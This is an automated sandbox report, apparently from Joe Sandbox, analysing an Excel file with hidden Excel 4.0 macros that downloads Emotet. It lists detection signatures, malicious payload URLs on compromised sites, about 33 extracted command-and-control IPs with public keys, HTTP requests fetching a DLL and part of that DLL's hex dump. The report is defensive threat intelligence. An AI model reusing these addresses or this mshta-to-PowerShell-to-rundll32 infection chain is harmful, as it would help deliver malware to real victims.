Windows Analysis Report
80_513972285.xls

Overview

General Information

Sample Name: 80_513972285.xls
Analysis ID: 562424
MD5: c130bfd7e7632f18fcd505d0991f192f
SHA1: da0d0031d5f6386f0df623a3c1cabfe4e9778f51
SHA256: eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://kuyporn.com/wp-content/XS Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlMuzL Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlfunction Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/w Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlv1.0 Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3 Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-b Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3 Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/ Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/ Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/ Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/ Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/Yc Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlXtrP Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.pngPE3 Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/ Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3 Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/g Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlEtrM Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlA( Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/ Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/ Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlO( Avira URL Cloud: Label: malware
Source: http://kuyporn.com Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/PE3 Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlB Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-con Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/PE3 Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.png Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlC: Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/ Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3 Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-inclu Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168 URL Reputation: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/PE3 Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/ Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlmshta Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3 Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin Avira URL Cloud: Label: malware
Found malware configuration
Source: 10.2.rundll32.exe.2130000.4.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Multi AV Scanner detection for submitted file
Source: 80_513972285.xls ReversingLabs: Detection: 33%
Multi AV Scanner detection for domain / URL
Source: kuyporn.com Virustotal: Detection: 9% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: kuyporn.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 74.207.230.120:8080
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 37.59.209.141:8080
Source: Malware configuration extractor IPs: 116.124.128.206:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 203.153.216.46:443
Source: Malware configuration extractor IPs: 168.197.250.14:80
Source: Malware configuration extractor IPs: 207.148.81.119:8080
Source: Malware configuration extractor IPs: 195.154.146.35:443
Source: Malware configuration extractor IPs: 78.46.73.125:443
Source: Malware configuration extractor IPs: 191.252.103.16:80
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 185.168.130.138:443
Source: Malware configuration extractor IPs: 142.4.219.173:8080
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 159.69.237.188:443
Source: Malware configuration extractor IPs: 190.90.233.66:443
Source: Malware configuration extractor IPs: 104.131.62.48:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 185.148.168.15:8080
Source: Malware configuration extractor IPs: 54.38.242.185:443
Source: Malware configuration extractor IPs: 198.199.98.78:8080
Source: Malware configuration extractor IPs: 194.9.172.107:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 66.42.57.149:443
Source: Malware configuration extractor IPs: 185.148.168.220:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 128.199.192.135:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 59.148.253.194:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 557056Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 20:24:48 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 20:24:48 GMTContent-Disposition: attachment; filename="NsLUiuT.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 20:24:48 GMTX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View IP Address: 104.131.62.48 104.131.62.48
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 15
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se
Source: mshta.exe, 00000004.00000002.436735526.00000000003C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414890461.0000000003572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlA(
Source: 80_513972285.xls.0.dr String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlB
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlC:
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlEtrM
Source: mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlMuzL
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlO(
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlWinSta0
Source: mshta.exe, 00000004.00000002.434904863.00000000002EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432627473.00000000002E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlXtrP
Source: mshta.exe, 00000004.00000003.418218977.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlfunction
Source: mshta.exe, 00000004.00000003.416857633.0000000002B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlmshta
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlv1.0
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.png
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.pngPE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/PE3
Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.c
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XS
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XSs5/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XSs5/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/Yc
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/PE3
Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.432498297.0000000003536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000003.432412944.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415021403.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431896244.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431603651.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431688138.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437362266.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437239734.000000000409B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.c
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/g
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-con
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-b
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-inclu
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/w
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
